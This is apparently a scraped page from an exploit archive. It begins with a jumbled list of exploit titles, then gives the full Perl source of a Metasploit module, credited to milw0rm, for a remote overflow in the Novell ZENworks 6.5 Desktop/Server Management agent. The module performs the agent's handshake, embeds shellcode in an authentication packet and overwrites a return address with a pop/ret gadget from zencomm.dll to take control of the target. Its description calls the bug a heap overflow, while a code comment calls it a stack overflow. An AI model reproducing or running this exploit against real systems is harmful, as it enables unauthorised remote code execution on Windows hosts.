
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
132 lines
3.2 KiB
Perl
Executable file
132 lines
3.2 KiB
Perl
Executable file
#
|
|
#
|
|
|
|
package Msf::Exploit::zenworks_desktop_agent;
|
|
use strict;
|
|
use base "Msf::Exploit";
|
|
use Pex::Text;
|
|
|
|
my $advanced = { };
|
|
|
|
my $info =
|
|
{
|
|
'Name' => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',
|
|
'Version' => '$Revision: 1.1 $',
|
|
'Authors' =>
|
|
[
|
|
'Anonymous',
|
|
],
|
|
'Arch' => [ 'x86' ],
|
|
'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],
|
|
'Priv' => 1,
|
|
|
|
'UserOpts' =>
|
|
{
|
|
'RHOST' => [1, 'ADDR', 'The target address'],
|
|
'RPORT' => [1, 'PORT', 'The target port', 1761 ],
|
|
},
|
|
|
|
'Payload' =>
|
|
{
|
|
'Space' => 0x7FFF,
|
|
'BadChars' => "\x00",
|
|
'Keys' => ['+ws2ord'],
|
|
},
|
|
|
|
'Description' => Pex::Text::Freeform(qq{
|
|
This module exploits a heap overflow in the Novell ZENworks
|
|
Desktop Management agent.
|
|
}),
|
|
|
|
'Refs' =>
|
|
[
|
|
['BID', 13678],
|
|
],
|
|
|
|
'Targets' =>
|
|
[
|
|
[ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 0x10002e06]
|
|
],
|
|
|
|
'Keys' => ['zenworks'],
|
|
};
|
|
|
|
sub new {
|
|
my $class = shift;
|
|
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
return($self);
|
|
}
|
|
|
|
sub Exploit {
|
|
my $self = shift;
|
|
my $target_host = $self->GetVar('RHOST');
|
|
my $target_port = $self->GetVar('RPORT');
|
|
my $target_idx = $self->GetVar('TARGET');
|
|
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
|
my $target = $self->Targets->[$target_idx];
|
|
|
|
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
|
|
|
|
my $s = Msf::Socket::Tcp->new(
|
|
'PeerAddr' => $target_host,
|
|
'PeerPort' => $target_port,
|
|
'LocalPort' => $self->GetVar('CPORT'),
|
|
);
|
|
|
|
if ( $s->IsError ) {
|
|
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
|
|
return;
|
|
}
|
|
|
|
my $req = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77";
|
|
$self->PrintLine( "[*] Sending version identication" );
|
|
$s->Send($req);
|
|
|
|
my $ident = $s->Recv(-1, 16);
|
|
if (length($ident) != 16)
|
|
{
|
|
$self->PrintLine( "[*] Failed to receive agent version identication" );
|
|
return;
|
|
}
|
|
else
|
|
{
|
|
$self->PrintLine( "[*] Received agent version identication" );
|
|
}
|
|
|
|
$req = "\x00\x01";
|
|
$self->PrintLine( "[*] Sending client acknowledgment" );
|
|
$s->Send($req);
|
|
|
|
# stack overflow in ZenRem32.exe / ZENworks Server Management
|
|
|
|
$req = "\x00\x06metmet\x00\x06metmet\x7F\xFF" . $shellcode . "\x00\x01";
|
|
$self->PrintLine( "[*] Sending authentication data (including shellcode)" );
|
|
$s->Send($req);
|
|
|
|
$s->Recv(2, 2);
|
|
$s->Send("\x00\x01");
|
|
|
|
#$s->Recv(2, 2);
|
|
#my $len = $s->Recv(2,2);
|
|
#$len = unpack ('n', $len);
|
|
#$s->Recv($len, $len);
|
|
|
|
$s->Send("\x00\x02");
|
|
|
|
$self->PrintLine( "[*] Sending final payload" );
|
|
|
|
# pop/pop/pop/pop/pop/ret in zencomm.dll on our shellcode
|
|
my $crash = "A" x 0x20;
|
|
$req = "\x00\x24" . $crash . pack('V', $target->[1]);
|
|
$s->Send($req);
|
|
|
|
$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
|
|
select(undef, undef, undef, 4);
|
|
|
|
$self->Handler($s);
|
|
return;
|
|
}
|
|
|
|
1;
|
|
|
|
# milw0rm.com [2005-08-12]
|